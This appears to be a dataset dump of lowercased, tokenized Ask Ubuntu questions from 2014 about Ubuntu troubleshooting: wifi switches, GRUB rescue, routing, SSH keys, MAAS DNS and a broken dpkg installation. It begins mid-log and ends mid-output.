pushing /home/hanafi81/.cache/ubuntuimages/gpg/image-master.tar.xz to device 2.05 mb / 334.17 mb [ ________________________________ ] 0.61 % 208.21 kb/s 27m13s2014/06/12 18:33:31 done pushing /home/hanafi81/.cache/ubuntuimages/pool/device-8e3e30aa503cbe9b6fdf3497ad5cf38398f8bcf88c80d98a988a4ad464b3db28.tar.xz to device 334.17 mb / 334.17 mb [ ==================================== ] 100.00 % 1.07 mb/s 2014/06/12 18:38:33 start pushing /home/hanafi81/.cache/ubuntuimages/pool/ubuntu-473f9aa1f2618d7eee30e116491b01ec5815baa7b9a7b7c02afb88896c15f041.tar.xz to device 2014/06/12 18:39:50 done pushing /home/hanafi81/.cache/ubuntuimages/pool/ubuntu-473f9aa1f2618d7eee30e116491b01ec5815baa7b9a7b7c02afb88896c15f041.tar.xz to device 2014/06/12 18:39:50 created ubuntu_command : /home/hanafi81/.cache/ubuntuimages/ubuntu_commands665141130 2014/06/12 18:39:50 rebooting into recovery to flash
482268	wifi switch takes wlan0 down , but does n't bring it back up . found a possible cause and solution just need to know how to apply it	i 've got an old acre extensa laptop with a wifi button which takes the wifi down ok . when pressing it again to enable it i get the following log : jun 12 12:11:58 digit-laptop wpa_supplicant [ 14223 ] : rfkill : wlan unblocked jun 12 12:11:58 digit-laptop wpa_supplicant [ 14223 ] : could not set interface wlan0 flags ( up ) : operation not possible due to rf-kill jun 12 12:11:59 digit-laptop wpa_supplicant [ 14223 ] : rfkill : wlan unblocked my assumption is that wpa_supplicant , or the invoking script is trying to bring the interface up before the hard block is removed and wpa_supplicant reports it . ifdown -a ifup -a fixes everything . so , my solution ( s ) are to either find the mapping between the button and the script , edit the script to add a delay , or edit a config somewhere to do the same for wpa_supplicant or ... .im not sure where or what i should be looking to edit to correctly solve this issue . or this is already answered but i 've looked and looked and the wood is hiding in the trees somewhere , so , im asking for help ... .please : ) ive verified that the soft and hard blocks are added and removed after button presses it just seems to be the order of events that causes the problem . pressing the button quickly , results in the orange light coming on but very odd behaviour , having to issue several ifdown -a commands in order to successfully run an ifup -a command . im not to concerned with the robustness of the switch , i can handle pressing it once and waiting before the urge to press it again . any ideas ? thanks for the help ... or reading my question at least : ) cheers , twokay
482270	gtk changes all ss to ă gtk themes not saved on restart	i am using kubuntu 14.04 and have the following problem : all gtk apps ( thunderbird , polly , gimp and so on are changing all ss to ă ) locale is de_de this happens in all menus lists and so on . is there a way to change the default behavior ?
482277	how to merge odt documents from the command line ?	i have a large number of odt reports in one folder . how can i merge them into one odt document from the command line ? i have found that this was possible in ooo_cat , but that seems deprecated ( or at least i do n't know where to start to use it ) . is it possible to merge odt documents from the command line ? does ooo_cat do the trick , if so , how can i install and use it ?
482281	14.04 media server , general questions , force boot , lean running , auto updates..	i have setup ubuntu 14.04 desktop as a media server , i know , i know , should have gone with server.. i wanted the gui though . i have a few questions.. 1 ) is there anything i can disable or trim down to make it more lean in running ? ( i know.. should have used server ) 2 ) is there a way to make it always attempt to fully boot no matter what errors it encounters during the boot ? i vnc in remotely and it 's a major pain if it does n't boot to at least the point where vnc loads . for instance , i changed some mount settings and mispelled something while at work , i rebooted and it was just dead because i needed to hit `` s '' to skip mounting that drive . i want it to just ignore everything it encounters and try to boot every time . 3 ) is there an auto update system i could use so that it auto updates and reboots once a week at some time i determine ?
482283	grub rescue error : file not found after fsck and a few updates	i am new to ubuntu . i was using ubuntu 12.04 lts . i ran a sudo fsck on my terminal and went on pressing y for a long time at the prompts that appeared . when it seemed to continue for long , i did a ctrl+c and restarted . meanwhile , i also installed a few updates that had popped up . on restart , it showed the grub rescue prompt with error : file not found i used a bootable usb to boot in and there i did the following in the terminal : http : //askubuntu.com/a/203242/285385 after this , the system logged into windows directly with no grub screen . i again used the bootable usb and mounted the sda8 on which linux is shown to exist . then , i did the following : sudo grub-install -- root-directory=/mnt /dev/sda sudo update-grub this error appeared- grub2 - failed to get canonical path of /cow on reboot , the prompt became a grub > prompt with the following heading : gnu grub version 2.00-7ubuntu11 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > i rebooted again using the live usb and did fsck -fy /dev/sda8 and then rebooted again . here is the output of the bootinfoscript : https : //docs.google.com/document/d/1itf2oyyd4zsszthhwis71j5xjyh5igfqpaaszkvgrrg/edit ? usp=sharing it still shows the minimal bash-like line editing ... .grub > prompt . how do i fix it ?
482290	adobe kuler to gimp importer or converter	is there any ubuntu package for converting from .ase to .gpl for use with gimp ? a package plug-in , or anything of that sort is appreciated !
482294	why firefox on the vm has the same capabilities of the firefox of the host machine ?	i installed a virtual machine on virtualbox . my host machine is ubuntu 12.04 lts . my problem is that i found all the addons of firefox of the host ubuntu in the firefox browser of the guest machine . in the guest machine , when i check the folder where the addons are saved , i do not find anything , but from its behavior , i guessed that it has all the capabilities firefox-hostmachine has ( for example i can watch youtube on the vm without installing an approriate addon ) .how can i avoid that the addons of host machine to be used by the browser of the virtual machine ?
482296	how to restore xubuntu 14.04 default icons ?	hey beloved community ! i really screwed up today , i was fooling around as root via terminal in the icons folder and i accidentally deleted all my icons . i was wondering , is it possible to reinstall the default xubuntu 14.04 icons/themes ? if yes , could anyone please share the terminal command for that ? i googled my problem but could n't find anything.. gosh , lesson learned , never fool around while logged in as root ! i checked my trash bin , but unfortunately there 's nothing in it . any information would be greatly appreciated ! have a nice day !
482299	server asking for password even after adding ssh keys	this was working fine but not sure suddenly stopped working . i have added my id_rsa.pub key of localhost to authorized_keys of .ssh folder on server . when i try to login to server ( running ubuntu 12.10 ) from localhsot with ssh account @ ip it asks for password . i am not sure what i am doing wrong since it looks to be pretty straight forward process and it was working fine earlier . any help ?
482301	nvidia drivers break several hot-keys on ubuntu 14.04	i have a thinkpad w530 , which has optimus . when i am running the nvidia card with nouveau or the intel integrated card with intel drivers , the microphone mute , thinkvantage key , and brightness works fine . when i switch to nvidia-prime with the nvidia proprietary drivers , all three of those functions stop working . i have been unable to fix it so far . are there any resolutions for this problem ?
482307	kidle_inject uses cpu power without apparent reason	i am using ubuntu 14.04 lts on an i5-3250m , 6gb ram dell inspiron laptop . i have been noticing all this time from my cpu usage monitor that there is high usage of my cpu ( without using something really intensive ) and it leads to overheating . i checked from the system monitor , and at first it seemed like my graphics card was the problem ( amd radeon 7670m - hybrid graphics with intel hd 4000 ) . anyway , i installed fglrx-updates ( the only one that actually kind of fixed the overheating problem - fglrx and xorg did n't help ) and things ran a bit smoother . i also installed intel p-state and thermald . put it on powersave governor , but still no luck . also installed tlp ( no conflict between them ) . tried to see if the fault is from compiz or adobe-flash . no luck . also , html5 uses a lot of cpu after a bit and it lags everything on my comp . after doing all of those , i was looking at the results from the $ top command and the culprit seems to be kidle_inject . it uses like 50 % of the cpu everytime . i could n't help but notice that it seemed like it had four modules - kidle_inject/0 to kidle_inject/3 . so , what is this kidle_inject ? i have n't been able to find something conclusive on the subject . it seems to be on when i use something that is resource intensive and it continues hogging my cpu for a minute or two after terminating usage . how can i fix this so that my comp is usable at last ? i am talking about a minimum temperature of 70c in low-performance use . i am heavily dependent on linux and i would like to keep using ubuntu ( since i am used so much to it and i have grown fond of it ) . -- i have to say that this is not my machine 's fault . when it runs on windows 7 it 's running fantastic with low temperatures .
482308	terminal 's `` use custom default terminal size '' property does not work	i 'm trying to make custom property for terminal size . my changes has no effect and terminal still starts in full screen mode .
482313	ubuntu maas dhcp working dns not working	i setup ubuntu 14.04 maas on one server . i setup interface to manage dhcp and dns via the cluster interface . dhcp is working . but , dns is not ! when i try to add another node , it is doing pxe boot , getting ip address from the cluster controller , and booting up ... but , it is not connected to internet - `` ping google.com '' does not work . i have two interfaces on maas server . one interface connected to our organization network . and , another interface for managing private network - all the nodes for the cluster . the latter interface is where i have my own dhcp server . my dhcpd.conf option domain-name-servers < > ; i even tried setting it to option domain-name-servers < > ; any suggestions on how i can fix the above ? thanks
482314	routing table incorrect at startup	whenever i reboot my ubuntu server , the routing table is incorrect for the default route . the routing table correctly specifies the lan ip address 192.168.124.0/24 . all other traffic should go through the router at 192.168.124.253 , but the default route specifies 192.168.124.254 for the gateway : jos @ hallway : ~ $ ip route list default via 192.168.124.254 dev eth1 proto static 192.168.124.0/24 dev eth1 proto kernel scope link src 192.168.124.101 and similarly : jos @ hallway : ~ $ sudo route -n [ sudo ] password for jos : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.124.254 0.0.0.0 ug 0 0 0 eth1 192.168.124.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 i have to manually correct this to .253 , using : sudo ip route del default sudo ip route add default via 192.168.124.253 otherwise , the server wo n't be able to reach the internet . where does this .254 come from ? it is not in my /etc/network/interfaces , or anywhere in /etc/iproute2 . the server has a single ethernet interface with a static address . my /etc/network/interfaces is simply this : auto lo iface lo inet loopback auto eth1 iface eth1 inet static address 192.168.124.101 netmask 255.255.255.0 gateway 192.168.124.253 dns-nameservers 192.168.124.253 8.8.8.8 8.8.4.4 my /etc/resolv.conf : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.124.253 nameserver 192.168.124.253 nameserver 8.8.8.8 nameserver 8.8.4.4 so what is going on here ?
482317	why is my vimtutor blank ?	i want to learn vim . the vast majority of people advise me to use vimtutor . i downloaded the package and ran it , but i just get given a blank screen . i see on youtube that there should be tons of things on there . but i am not getting it ... how can i fix this ? originally , i was told by the terminal to install vim-runtime in order to run vimtutor , and i did and it ran , albeit with a blank screen . i was able to run this tutorial after i installed vim-gtk . anyone know why it did n't show up the first time ?
482320	how can i stop yacy from starting when my machine starts ?	i have installed the yacy p2p search engine following these instructions ( adding the yacy repo to my sources and installing from there ) : http : //www.yacy-websuche.de/wiki/index.php/en : debianinstall that page includes instructions on starting/stopping the yacy daemon : sudo /etc/init.d/yacy stop sudo /etc/init.d/yacy start sudo /etc/init.d/yacy restart i can stop yacy right now , but it starts again the next time i boot up . how can i stop it doing that , and only start when i tell it to ( with sudo /etc/init.d/yacy start ) ? this upstart technique to permanently disable a service ( accepted answer at how to enable or disable services ? ) does not work ( yacy still starts next time i boot ) : sudo sh -c `` echo 'manual ' > /etc/init/yacy.override '' # does n't work
482321	how can i quickly switch between workspace layouts ?	i need hotkeys to switch between multiple layouts for the same 5 windows . one is ff and the others are terminal windows . wih workspaces this does not work . the closest i got to my goal was making windows available in multiple workspaces . but all size modifications i make to the sizes of windows are carried on to all workspaces i do not want that . is there a way to achieve this ? maybe by getting a 3rd part package ? i am using ubuntu 14.04 lts thank you
482323	firewall router	ok i throw in the towel . before posting i ran read untold website forums / examples , tried lots of commands so please don’t say ‘google is your friend’  i want to setup an ubuntu virtual pc as a router between two vlans as a firewall / router currently i have 10 vlans on a hp procurve 5406 with a default route to our local authority . one of the vlans i have setup as guest which gets an ip address for my dhcp server . i still need the dhcp to give addresses as that’s how the local authority filter our internet . so any machine on the guest vlan should get an ip from dhcp server . the ubuntu firewall router will then block access to other vlans ( ip tables ) and route traffic to vlan 13 then out into the big wide world . my ubuntu ip address config eth0 ipaddress 10.80.0.67 mask 255.255.255.192 dg 10.80.0.65 ( this is vlan 21 ) eth1 ipaddress 10.80.0.59 mask 255.255.255.240 dg 10.80.0.49 ( this is vlan 13 ) pc on vlan 21 get ip address 10.80.0.70 with dg 10.80.0.67 how do i set this up so the ubuntu forwards all internet traffic to eth1 and out to internet . i have tried setting the dg from eth0 as the dg on eth1 and vice versa . i don’t have a great knowledge of ubuntu ( you guessed that i think ) i am using ubuntu 12 . i can work on the firewall blocking off the other vlans later but just getting the route out would be a start
482324	using super+key that are already setup by unity	i want to use my superkey for custom shortcuts . sometimes it does not seem possible , if the key combination is already used by unity . for example , i want to set super+a to switch to the window demanding attention . i set it in ccsm -▸ extra wm actions -▸ activate demanding attention window , but when i press it , the launcher opens in application mode instead . same thing with super+f , it opens the launcher in file mode instead of going fullscreen as i defined in compiz . i have read this article : can i define keyboard shortcuts using the super key ? but there is no `` key to show the launcher '' in 14.04 , only a `` key to show the hud when tapped '' , which i have already disabled . it shows up in the all settings -▸ keyboard as well , also disabled . as i understand , the hud is not the same as the launcher anyway . ideally i would like to keep the super behavior ( opening launcher ) when pressed alone , but still have the ability to define my own super+key combinations . i also want to keep super+digit .
482327	harpia not installing	harpia does not want to install via the software center or via the command line . in the command line it says : lukas @ lukas-inspiron-n7010 : ~ $ harpia traceback ( most recent call last ) : file `` /usr/local/bin/harpia '' , line 32 , in < module > from harpia import harpiagcfrontend file `` /usr/local/lib/python2.7/dist-packages/harpia/harpiagcfrontend.py '' , line 43 , in < module > from harpia.amara import binderytools as bt file `` /usr/local/lib/python2.7/dist-packages/harpia/amara/binderytools.py '' , line 13 , in < module > from ft.xml import inputsource importerror : no module named ft.xml where can i find this elusive ft.xml and where does it need to go ? i am using harpia 0.4 beta and ubuntu 14.04 lts
482328	desktop window orgnanizer	suppose you open four windows . one is geany one a browser one is libreoffice and one is terminal . so is there any shortcut key which open four of them next together . i mean this key switch divde the screen to four parts and on every part you see one window . i use unity
482329	how to develop android apps in eclipse with gstreamer ?	is there a good and clear tutorial to make install eclipe with andoid and gstreamer developpement in ubuntu 12.04 ? when i import the tutorial , that an error `` gstreamer can not be resolved `` with the import com.gstreamer.gstreamer ! ! thanks
482331	mounting problem while setting up pxe	i 'm trying to set up a server using pxe and following this ( clickable ) instruction . but i have a problem in part enter the install environment with command mount /proc an error is proc : unrecognized mount option `` default '' or missing value can anybody tell how to fix it ?
482332	apt-cacher for ubuntu 12.04 need to cache from https repos	i need to use apt-cacher or some other similar item to avoid the download of the same package from my https central repository . this is the configuration : there is a central server with a repository accessible remotelly , and n dislocatated pc that have internet connection . every of these , can have 0-m client pc , with not internet connection , that can request the download of the same packages . apt-cacher works well just as a proxy server , but not for cache ( as it is claimed in the man page ) . i would like to know if there is some other package that i can use for my purpose . thank you roberto
482339	ca n't open any of my drives/devices ( not usb drive )	i ca n't open any of my computer drives ( : c/ , :d/ ... .. ) every time i tried to open the drives , the following notice appeared : ( i 'm new in ask ubuntu , so , i ca n't upload the snapshot , i need 10 reputations to do that ) **unable to access `` __ volume '' ** error mounting/dev/sda7at/media/mypc/__volume : command-line 'mount-t '' ntfs '' -o '' uhelper=udisk2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' '' / dev/sda7 '' '' /media/mypc/__volume '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0,0 ) .| metadata kept in windows cache , refused to mount . failed to mount '/dev/sda7 ' : operation not permitted the ntfs partition is in an unsafe state.please , resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i have windows side by side ubuntu 13.04 in my computer and i have done ( like-shutting down windows properly ... ) things as these in the notice . but it 's not working .
482340	unable to make changes in drive	i have just installed ubuntu 14.04 and i created 2 partitions . first has 50 gb and the other has 250 gb . everything works in the system drive ( create folder , cut/copy ) but i am unable to make any changes the the other drive . it opens normally but i am unable to create folder , cut/copy/paste or make any changes.i checked the permissions under 'properties ' and it says i am not the owner and all options are greyed out . however when i check system information it says that i am the administrator . i am attaching two pics for your reference . thanks in advance
482341	my ubuntu wont boot after i shut it down	i shut down my laptop one night and moved it . it was working fine before i shut it down . the next day i try to turn it on and i got this . no init found . try passing init= bootarg . busybox v1.13.3 ( ubuntu 1:1.13.3-1ubuntu11 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) i dont know what happened . i tried every help command but nothing helped . some just froze my computer . what do i do to fix it ? ( i do n't know much about computers so the simplest way would be appreciated though if i need to i 'll learn more . )
482342	xfce : show window borders on maximised windows	i am using a plank dock at the bottom of my screen and set it to never hide because i want to use it instead of a normal taskbar . this causes even maximised windows to not overlap it . you can clearly see part of my wallpaper because the dock is transparent . however , maximised windows do not have a border . this does not look very good because of the dock ; the window content is not clearly separated from my wallpaper . for now i am taking advantage of xfce 's automatic window size saving - i resized my windows which i always use maximised ( browser , e-mail ... ) but this is only a temporary solution . how can i get xfce to always draw borders even on maximised windows ? the best solution for me would be something that only draws the bottom border and titlebar , but not the left and right borders ( i am using a 5:4 display and i 'd like to keep the horizontal screen real estate , even if it 's just a few pixels ) . if this is not possible then i 'm also okay with all borders showing .
482347	what does the verbose output for 'wipe ' mean ?	this is in regards to the actual `` wipe '' command . i 've looked through the man page and not gotten an answer . i 've been unable to find any documentation online which explains what the verbose output means . does anyone have any insight ? the above output is from a `` quick '' wipe ( n number of passes with random data ) . some files ( small in size ) wipe relatively quickly so the output lists the total bytes wiped . but others show a progress which displays [ x / y ] , where value `` x '' counts up during each wipe iteration . and it 's unclear what the value of `` y '' is . in the above image , `` 4228 '' what ? that value remains constant with each iteration . the file in question is about 64mb in size . the second image here is taken from wiping a copy of the same file , but in `` standard '' mode , which performs ~34 passes . in the standard mode , what does the value in parenthesis `` ( 14 ) '' mean ? this value seems to change with each pass .
482350	installing gcc 4.9 on 12.04 ( precise )	i ca n't find any ppa 's that provide gcc 4.9 for ubuntu 12.04 . any suggestions on how to obtain it ? note : this is probably not a duplicate question . related questions are : gcc 4.8 for 12.04 : answered gcc 4.9 for 14.04 : answered gcc 4.9 for 12.04 ? ?
482352	error installing ubuntu-restricted-extras	ubuntu said i needed to install plugins using the following command in terminal : sudo apt-get install ubuntu-restricted-extras but then i got this error : reading package lists ... .done building dependency tree reading state information ... done e : unable to locate package ubuntu-restricted e : unable to locate package extras so , what to do now ?
482362	after getting firefox update ca n't access internet anymore	i just took some updates including mozilla updates and ca n't connect anymore to internet . we have a proxy server , we had previously imported all the needed certificates and internet was working perfectly . after taking the update version 30.0+build1-0ubuntu0.12.04.3 i ca n't access internet anymore with error proxy_auth_required and firefox is indeed not asking me anymore for proxy username and password . i tried resetting firefox in the help - > troubleshoot page , and tried re-importing the proxy server certificates , proxy settings were unchanged . is there a way in ubuntu to revert to firefox 29.x instead of 30 ? otherwise can anyone suggest what to do to solve it ?
482365	acpi events not triggered after booting	i purchased a convertible ( laptop and tablet , ubuntu 14.04 installed ) and would like to execute a script when changing from laptop to tablet mode and the other way around . so i created two new files within the /etc/acpi/events folder corresponding to two new scripts in the /etc/acpi folder . everything works well if i create a new acpid process ( e.g `` sudo acpid -c /etc/acpi/events -s /var/run/acpid.socket '' ) manually . however , if i do not initiate this process manually the scripts are not executed , even though there is a process running with the same options right after the machine has booted by default . the only difference i can find is the parent pid . if i create the process the parent is `` init -- user '' , while the parent of the automatically initiated process is `` /sbin/init '' . can anyone help me by explaining why this issue happens and how i can avoid to start an acpid process manually every time i boot the device ?
482366	d-link dwl-650+ does n't work	i have installed ubuntu 14.04 on my old hp laptop i tried to use d-link dwl-650+ pcmi wifi card it does not work please help me
482367	keyboard shortcuts involving shift and digits	i am trying to set shift+ctrl+alt+1 to move a window to workspace 1 . settings- > keyboard- > navigation- > move window to workspace 1 when i type the new accelerator , what shows up is shift+ctrl+alt+ ! . ! is of course shift+1 . two issues : the keyboard shortcut does not work . if it did i am afraid that it would break when i use different keyboard layouts ( shift+4 is not the same character in both layouts i use ) . how do i fix the shift+ctrl+alt+1 shortcut ? edit : it turns out that `` put on viewport # '' in ccsm plugin `` put '' kind of works . < control > < shift > < alt > exclam is the string generated for 1 , but it works even if the layout does not have ! on shift+1 . still an issue with that : the action puts the window in an arbitrary viewport , but then switches to that viewport . that is not what i want .
482368	how to convert a .glade file to a .py file	i have been using gtk a lot to make my python programs have a graphical interface , and it 's pretty awesome . i recently discovered glade which is a hassle-free way of making a gui for your programs . i used glade to make the program the way i wanted it to look , and now i would like to look at it 's code , but i have no idea how to . some help would be appreciated , thanks ubuntu : )
482369	is there a way to download linux applications from other computers ?	in my house there is no internet connection , then i ca n't use the 'sudo apt-get install ' command . i wonder if i can download a package , put it in my computer in a specific folder , and just get the terminal to install and run it ? ( edit : ) sorry , i searched for a question like mine but did n't find any , so i posted this .
482371	is there something like batch file in ubuntu ?	i have ubuntu 14.04 installed . i was using windows until my windows 7 corrupted . i was learning about batch file ( .bat or .cmd ) . is there anything alike with it in ubuntu ? if there is what is it ?
482373	how do i install redshift 1.9.1 ?	i 'm new to linux and i do n't know how to install redshift 1.9.1 , configure the color temperature and make it automatically start . i 'm using ubuntu 14.04 lts .
482375	how to completely delete and reinstall a printer driver ?	the printer has some issues and i believe that if i delete completely the printer driver and then i reinstall it , it will work . how can i do this ? removing the printer and then adding it again does n't deletes the driver i guess .
482379	mobile broadband is not working	this seems to be a huge problem ! in my network dropdown menu there are so many items such as the image shown below , all of them are not been used by me any time since the first session of ubuntu after the installation . i ca n't connect to a mobile boradband connection with this issue . even it does n't recognize my hsdpa modem . this was the error that given by the connection manager when i tried to create a new network or click any item that drop down lish shows . `` ( 32 ) the connection was not supported by oforno . '' i removed ofoto so i thought i could solve my problem unluckily i could n't . i have another ubuntu os installed in my pc as im dual booting those two os togethor . i use other os as my default and i used to connect internet from every single method that drop down list shows .
482380	is there a boot option for keyboard layout ?	iâve used rescue cds that allow the keyboard layout to be selected at boot time , by choosing from a menu or by adding kb=uk to the boot command line alongside noapic and the like . does ubuntu support anything like this when booting from a live iso , or is the keyboard layout only changeable after the system has finished booting ?
482382	trouble when opening laptop lid . only black screen is displayed . ubuntu 14.04 ?	i have a asus s56ca laptop . when i bought this laptop , it came prinestalled with windows 8 wich i updated to 8.1 . i soon decided that windows was n't right for me and decided to use my old ubuntu 12.04 lts disk to install ubuntu and experienced no problems with this . i then updated this to ubuntu 14.04 lts using sudo update-manager -d. after this update i have had troubles waking up my laptop after closing the lid . i am either receiving a black , blank screen where all i can see is the mouse ( the mouse can be moved ) or the lock screen which i can not interact with at all ( entering password , moving mouse etc ) . i was wondering if anyone else has had this problem and how they got around it . if not , does anyone know a way to fix this and stop it from happening in the future . thanks all . edit : sudo fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00035215 device boot start end blocks id system /dev/sda1 * 2048 968617983 484307968 83 linux /dev/sda2 968620030 976771071 4075521 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 968620032 976771071 4075520 82 linux swap / solaris df -h : filesystem size used avail use % mounted on /dev/sda1 455g 14g 418g 4 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 393m 1.2m 392m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 580k 2.0g 1 % /run/shm none 100m 40k 100m 1 % /run/user
482384	indicator icons not visible or not responding in 14.04	after i upgraded to ubuntu 14.04 i noticed that indicator icons were missing in awn dockbar . i also tried cairo dock , it shows network icon and it 's functioning but all the rest such as wally , copyq icons are not functioning . i searched for the problem in askubuntu but i did n't find much info . i wonder if i am the only one who experiences this problem .
482386	what 's an alternative to truecrypt with exact same feature set ?	does any software for ubuntu exist that does the exact same thing as truecrypt ? i know there is a version of truecrypt for all platforms , but the developers abandoned the project . please do n't just start posting encryption software that can do the encryption this or that way , i am asking for the exact same thing . for windows there is `` safe house explorer '' .
482395	how to publish c++ qt project in ubuntu app store	i doing a c++ qt5 commercial app for publishing in ubuntu app store , i installed ubuntu sdk to develop and publish it . my surprise was there is no button for publish it in ubuntu sdk , so i 'm ask how to put my app in ubuntu app store ?
482396	problem with login node on maas via ssh	i 've a problem with the login on nodes via ssh . after i 've installed maas , added the ssh key on maas , added 2 nodes , made them in ready and then in allocated status , activated the power on using virsh , run the ubuntu 's installer on 2 nodes , re-boot the vms using their hd ... . when i try to connect them via ssh from maas svr they want the password . the prompt of node is ubuntu14 login : why ? i 've lost some steps ?
482397	dyndns change by going to a web page ( http ) in terminal	i have a isp with dyndns service where i am supposed to make the server use http to communicate with the dyndns servers at the isp . it goes like this : https : // [ username ] : [ password ] @ dyndns.myisp.com/nic/update ? hostname= [ host ] & myip= [ ip ] now here is my problem : i do n't know how to make my server `` use '' this http command to change the ip . i mean i know about cronjobs and how to make a simple bash script but i do n't know what command to use to make my machine `` visit '' this page .
482402	how to dual boot windows 8 and ubuntu 14.04 on acer aspire 7551g	i recently got an acer aspire 7551g on which i installed windows 8 . that worked fine . now installed ubuntu 14.04 and apart from the first successful boot , every other attempt to go to ubuntu takes me straight in windows 8 . i did some research online and i found out that i had to disable secure boot in uefi mode . but when i go into bios , i do n't see anything like uefi of secure boot anywhere . i would appreciate any help on this issue please . thanks in advance . yes ! both headings are there . security and boot . under security i have the following : set supervisor password , set user password , set hdd password and password on boot . under boot , i have ide0 : , cd/dvd , network boot , usb hdd , usb fdd and usb cd/dvd . all the above are under a broad caption boot priority order . and no ! booting does't take me to grub first . it takes me straight to windows 8 . thanks .
482407	overheating in an dual-boot system ( windows 8+ubuntu 14.04 )	precisely , i would like to know if booting windows 8 through grub can affect in any way the global performance ( cpu/gpu benchmarks , cooling efficiency etc ... ) in both windows and ubuntu 14.04 ... i have noticed a huge performance drop in both os since installing ubuntu in dual boot mode ( i had previously tested both os separately on the same machine ) . even in high temp ( +99째c ) the fans do n't seem to speed up ( thus i do n't think it 's a hardware issue ) i 'm using an acer aspire 5755g with legacy bios . i suspect grub since i have overridden acpi_os=default to acpi_os=linux , which got the backlight running .
482408	can not install any package via apt-get	so my problem is quite easy to describe : i ca n't install anything in my ubuntu installation . apt-get stopped working after i tried to fix some other package errors i was getting . now i 'm nowhere . let me try to explain how i ended up in this situation ... i was trying to install maven2 . i did sudo apt-get install maven2 and it did n't work . it told me that git-core is missing a new line in the end . so what i did was look up this error and try to fix it . i ended up finding a python script which would add new lines to files in /var/lib/dpkg/info . this is when everything got worse ... nothing would work anymore and the errors are even more ! this is that python script : import os dpkg_path = '/var/lib/dpkg/info/' paths = os.listdir ( dpkg_path ) for path in paths : path = dpkg_path + path f = open ( path , 'a+ ' ) data = f.read ( ) if len ( data ) > 1 and data [ -1 : ] ! = '\n ' : f.write ( '\n ' ) print 'added newline character to : ' , path f.close ( ) now when i try to install maven via sudo apt-get install maven ( i blamed maven2 for these errors , so i tried with maven only ) , i got the following error : fetched 49.5 mb in 2min 7s ( 387 kb/s ) : error processing package dpkg ( -- configure ) : â package dpkg is not ready for configuration can not configure ( current status `half-installed ' ) errors were encountered while processing : â dpkg e : sub-process /usr/bin/dpkg returned an error code ( 1 ) there are some other apt-get commands which i ca n't currently recall that outputted even more longer errors . i 'll update this question if i encounter them again . what do i do to fix this ? edit i did what i was asked in the comments section ( trying to install maven and then run sudo apt-get install -f and this is the whole output in the terminal : bash : /etc/bash_completion.d/git : no such file or directory dugi @ dugi : ~ $ sudo apt-get install maven [ sudo ] password for dugi : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libantlr-java libcommons-validator-java libdoxia-sitetools-java libjdependency-java libmaven-archiver-java libmaven-clean-plugin-java libmaven-compiler-plugin-java libmaven-dependency-tree-java libmaven-filtering-java libmaven-install-plugin-java libmaven-jar-plugin-java libmaven-plugin-tools-java libmaven-reporting-impl-java libmaven-resources-plugin-java libmaven-shade-plugin-java libplexus-compiler-java libplexus-digest-java libplexus-velocity-java libwerken.xpath-java velocity use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libaether-java libaopalliance-java libasync-http-client-java libcdi-api-java libcglib-java libgeronimo-interceptor-3.0-spec-java libguice-java libjackrabbit-java libjcommander-java libmaven-parent-java libnetty-java libplexus-classworlds2-java libplexus-cli-java libplexus-containers1.5-java libplexus-utils2-java libsisu-guice-java libsisu-ioc-java libwagon2-java libyaml-snake-java testng suggested packages : libaopalliance-java-doc libasync-http-client-java-doc libjcommander-java-doc libplexus-classworlds2-java-doc libplexus-cli-java-doc libplexus-utils2-java-doc the following new packages will be installed : libaether-java libaopalliance-java libasync-http-client-java libcdi-api-java libcglib-java libgeronimo-interceptor-3.0-spec-java libguice-java libjackrabbit-java libjcommander-java libmaven-parent-java libnetty-java libplexus-classworlds2-java libplexus-cli-java libplexus-containers1.5-java libplexus-utils2-java libsisu-guice-java libsisu-ioc-java libwagon2-java libyaml-snake-java maven testng 0 upgraded , 21 newly installed , 0 to remove and 129 not upgraded . 78 not fully installed or removed . need to get 0 b/49.5 mb of archives . after this operation , 12.4 mb of additional disk space will be used . do you want to continue ? [ y/n ] y dpkg : error processing package dpkg ( -- configure ) : package dpkg is not ready for configuration can not configure ( current status `half-installed ' ) errors were encountered while processing : dpkg e : sub-process /usr/bin/dpkg returned an error code ( 1 ) dugi @ dugi : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : fop java-wrappers libantlr-java libatinject-jsr330-api-java libbatik-java libclassworlds-java libcommons-configuration-java libcommons-io-java libcommons-jexl2-java libcommons-jxpath-java libcommons-net2-java libcommons-validator-java libcommons-vfs-java libdom4j-java libdoxia-java libdoxia-sitetools-java libfop-java libganymed-ssh2-java libguava-java libhttpclient-java libhttpcore-java libitext1-java libjaxen-java libjdependency-java libjdom1-java libjetty-java libjsoup-java libjsr305-java libmaven-archiver-java libmaven-clean-plugin-java libmaven-compiler-plugin-java libmaven-dependency-tree-java libmaven-filtering-java libmaven-install-plugin-java libmaven-jar-plugin-java libmaven-plugin-tools-java libmaven-reporting-impl-java libmaven-resources-plugin-java libmaven-scm-java libmaven-shade-plugin-java libmaven2-core-java libmodello-java libnetbeans-cvsclient-java libplexus-ant-factory-java libplexus-archiver-java libplexus-bsh-factory-java libplexus-build-api-java libplexus-cipher-java libplexus-classworlds-java libplexus-compiler-java libplexus-container-default-java libplexus-containers-java libplexus-digest-java libplexus-i18n-java libplexus-interactivity-api-java libplexus-interpolation-java 